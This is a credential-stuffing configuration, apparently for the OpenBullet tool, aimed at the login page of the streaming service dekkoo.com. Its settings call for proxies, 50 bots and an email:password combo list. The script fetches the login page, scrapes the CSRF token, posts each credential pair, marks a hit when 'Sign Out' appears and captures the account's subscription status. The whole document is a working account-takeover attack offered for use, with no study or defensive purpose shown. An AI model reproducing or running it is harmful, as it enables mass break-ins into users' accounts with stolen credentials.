[SETTINGS]
{
  "Name": "dekkoo.com",
  "SuggestedBots": 50,
  "LastModified": "2018-09-07T11:24:22.1370455+00:00",
  "AdditionalInfo": "Empty Capture means active but canceled Subscription",
  "Author": "meinname",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [
    {
      "SliceName": "USER",
      "RuleType": 2,
      "RuleString": "1",
      "Id": 1166275864
    },
    {
      "SliceName": "PASS",
      "RuleType": 2,
      "RuleString": "5",
      "Id": 839350095
    },
    {
      "SliceName": "USER",
      "RuleType": 1,
      "RuleString": " ",
      "Id": 1848163261
    }
  ],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Get REQUEST GET "https://www.dekkoo.com/login?return_to=https%3A%2F%2Fdekkoo.vhx.tv%2Fsettings%2Fpurchases" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#Token PARSE "<SOURCE>" CSS "[name=\"authenticity_token\"]" "value" 0 -> VAR "TOKEN" "" "" 
#Delay FUNCTION Delay "350" -> VAR "" 
REQUEST POST "https://www.dekkoo.com/login" AutoRedirect=TRUE 
  CONTENT "email=<USER>&authenticity_token=<TOKEN>&utf8=%E2%9C%93&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.dekkoo.com/login" 
KEYCHECK BanOn4XX=TRUE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "Sign Out" 
  KEYCHAIN Failure OR 
    KEY "Sorry, you entered incorrect email address or password" 
PARSE "<SOURCE>" LR "<div class=\"site-font-secondary-color\">" "</div>" Recursive=FALSE -> CAP "Subscription" "" "" 
